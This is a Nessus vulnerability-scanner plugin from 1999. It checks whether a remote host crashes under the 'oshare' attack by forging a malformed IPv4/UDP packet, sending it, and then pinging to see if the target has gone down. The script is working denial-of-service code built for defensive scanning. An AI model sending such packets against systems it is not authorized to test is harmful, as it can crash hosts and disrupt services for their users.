#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
#
# This attack is very unlikely to work from a large number
# of systems which check ip->ip_len before sending the packets.
#

if(description)
{
 name["english"] = "OShare";
 name["francais"] = "OShare";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
It was possible to crash the remote
system using the 'oshare' attack.

A cracker may use this problem
to prevent your site from working
properly.

Solution : contact your vendor for
a patch.

Risk factor : Serious";

 desc["francais"] = "
Il s'est avr possible de faire planter
la machine distante via l'attaque 'oshare'.

Un pirate peut utiliser ce problme pour
empecher votre rseau de fonctionner
correctement.

Solution : contactez votre vendeur et
demandez un patch.

Facteur de risque : Srieux";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes the remote host using the 'oshare' attack";
 summary["francais"] = "Plante la machine distante via l'attaque 'oshare'";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 
 script_family(english:family["english"], francais:family["francais"]);

 exit(0);
}

#
# The script code starts here
#

before = tcp_ping();

ip = forge_ip_packet(ip_v : 4, ip_len : 44, ip_hl : 11,
		     ip_tos : 0, ip_id : rand(), ip_off : 16383,
		     ip_ttl : 0xFF, ip_p : IPPROTO_UDP,
		     ip_src : this_host());

send_packet(ip:ip, len:40, pcap_active:FALSE);
		     
sleep(5);

after = tcp_ping();

if(before && !after){
		security_hole(0);
		set_kb_item(name:"Host/dead", value:TRUE);
		}
		     
		    
